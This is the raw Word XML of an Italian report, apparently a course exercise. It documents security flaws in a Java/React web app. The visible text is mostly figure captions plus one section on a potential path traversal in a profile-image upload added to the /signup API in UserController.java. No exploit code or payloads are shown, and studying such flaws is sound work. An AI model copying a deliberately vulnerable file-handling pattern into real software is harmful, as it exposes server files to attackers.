    <w:p w14:paraId="15537094" w14:textId="4C868489" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0FC781C1" w14:textId="3A238B70" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15080FA8" w14:textId="154744BC" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="423289BD" w14:textId="059C5127" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15418F3E" w14:textId="432C47B1" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="00B5A4C2" w14:textId="4267503C" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="00467BBC"/>
    <w:p w14:paraId="01DAEFDC" w14:textId="2E67AD6F" w:rsidR="00E16865" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1984CFCF" wp14:editId="68E33FD9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-633095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>32512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0E112378" w14:textId="7396A0E8" w:rsidR="00370316" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251816960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78734630" wp14:editId="1DA98A8D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>417830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7295515" cy="635"/>
                <wp:effectExtent l="0" t="0" r="635"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7F2C5105"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6</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63" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:32.9pt;width:574.4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QI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x300+z2W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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7C359B5E" w14:textId="7F2C5105"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Output del server in ascolto</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="01346EED" w14:textId="55E63D86" w:rsidR="009015E9" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251968512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CB585C5" wp14:editId="139D1968">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-579755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4493895" cy="1420605"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="662774006"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3895" cy="1420605"/>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2B9C6BA3" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0AE8B8F6" w14:textId="7CD324A1" w:rsidR="008B6F6D" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251819008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A5BA79D" wp14:editId="4B31245B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>221615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4469130" cy="635"/>
                <wp:effectExtent l="0" t="0" r="762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6595889E"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7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: CreateOff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64" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:17.45pt;width:35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gDGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L06aL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t7NPkym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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4337FDA0" w14:textId="6595889E"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7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: CreateOffer.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC61B36" w14:textId="1CB59A0F" w:rsidR="00A15CC1" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251969536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78579B1F" wp14:editId="7DE3F73D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7102643" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="366382220"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02643" cy="2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01B73F" w14:textId="028AAA58" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5ED2E724" w14:textId="014A5897" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="268E94E6" w14:textId="505804B1" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74B40A71" w14:textId="3577A16D" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="664B7DAB" w14:textId="583504A6" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EA0A956" w14:textId="135D0B27" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06BD5273" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="248BA531" w14:textId="5BB8DC88" w:rsidR="008B6F6D" w:rsidRDefault="00E12B17" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251821056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="665DECA0" wp14:editId="5DF12C44">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>230505</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14292B5F"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8</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5" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:18.15pt;width:518.0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G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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2FC09399" w14:textId="14292B5F"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>38</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B87073" w14:textId="7D4EC4FF" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2343ED60" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="10794C8E" w14:textId="77777777" w:rsidR="00E12B17" w:rsidRDefault="00E12B17" w:rsidP="00C53E14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19199977" w14:textId="374C983E" w:rsidR="00D12C9A" w:rsidRPr="00C53E14" w:rsidRDefault="00FD7204" w:rsidP="00C53E14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Potential </w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17321F5A" w14:textId="4C2E8E9B" w:rsidR="001A57CF" w:rsidRDefault="00C53E14" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB8072" w14:textId="16E016D3" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0026401D">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t>78</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50403A85" w14:textId="46DD296B" w:rsidR="0026401D" w:rsidRPr="0026401D" w:rsidRDefault="0026401D" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo caso, è stata aggiunta un’immagine del profilo dell’utente che è possibile inserire al momento della registrazione di un utente. Per fare ciò è stato modificata l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/signup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e sono stati aggiunti nello stesso file i metodi </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">getImage() </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Lato frontend il file Signup.jsx gestisce l’aggiunta dell’immagine del profilo come in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ed AccountUser.jsx si occupa di mostrarla, recuperandola dal backend</w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t xml:space="preserve"> (Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7990D5" w14:textId="6A8463E0" w:rsidR="0026401D" w:rsidRDefault="0026401D" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA4AE87" w14:textId="73F86B0D" w:rsidR="00E12B17" w:rsidRDefault="00850623" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251970560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08BB3289" wp14:editId="445A7DC7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5534060" cy="1183868"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="221523611"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60" cy="1183868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC378C6" w14:textId="7719BAE7" w:rsidR="00E12B17" w:rsidRDefault="00E12B17" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343542B2" w14:textId="636FFC2D" w:rsidR="00E12B17" w:rsidRDefault="00E12B17" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A259B0C" w14:textId="06DFC8B4" w:rsidR="0076032B" w:rsidRDefault="00850623" w:rsidP="00850623">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49A73624">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>57912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73497DF3"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39</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: AccountUs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6" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:45.6pt;width:364.9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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="543B8FE1" w14:textId="73497DF3"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39</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: AccountUser.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFC929" w14:textId="45CBE795" w:rsidR="0076032B" w:rsidRDefault="00850623" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251971584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="524DBFF8" wp14:editId="5052C655">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-625475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3825240" cy="4076187"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="2689353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240" cy="4076187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D2585" w14:textId="522359D0" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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7ACEBB3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0</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: SignUp.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7"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ZGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU01v2zAMvQ/YfxB0X+yka7A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Ct/mNkbAgAAQAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAAbBmc/hAAAACwEAAA8AAAAAAAAAAAAAAAAAdQQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAACDBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7F1A2CBF" w14:textId="7ACEBB3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0</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: SignUp.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D1452" w14:textId="24614B48" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A59858D" w14:textId="3A79E67F"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17154EF8" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B155D16" w14:textId="46C098B8" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500E8909" w14:textId="6C2B2E2E" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CA0B4A" w14:textId="7566D0C0" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609B0E19" w14:textId="1A55F229" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EEAAF4" w14:textId="6E37C657" w:rsidR="0076032B" w:rsidRDefault="00D930D6" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251972608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24CBD431" wp14:editId="6CC0E154">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6423497" cy="4762500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1935680310"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3497" cy="4762500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372A1DC" w14:textId="51861985" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D815732" w14:textId="3ABB687B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7EAC15" w14:textId="1A4BAC63" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B674EAF" w14:textId="772D9120" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E64A63" w14:textId="088D4C32" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F787ED" w14:textId="4E28D4EC" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADC421D" w14:textId="4D7C2C79" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B47F7A" w14:textId="4C3F4E37"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5CC9CBA2" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDA2333" w14:textId="539E0B20" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208080D2" w14:textId="408848B8" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE7A490" w14:textId="40A228D2" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42223A49" w14:textId="0388E75B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A5D8FF" w14:textId="57444C19"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2B77A433" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDF0EA3" w14:textId="27E2F286" w:rsidR="0076032B" w:rsidRDefault="00D930D6"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722FDFBE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175895</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1D575930"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1</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8" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:13.85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ZR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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0A2E3FF3" w14:textId="1D575930"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1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF1A7C" w14:textId="37DB310B" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D67AE61" w14:textId="048117D9" w:rsidR="0076032B" w:rsidRDefault="00850623" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
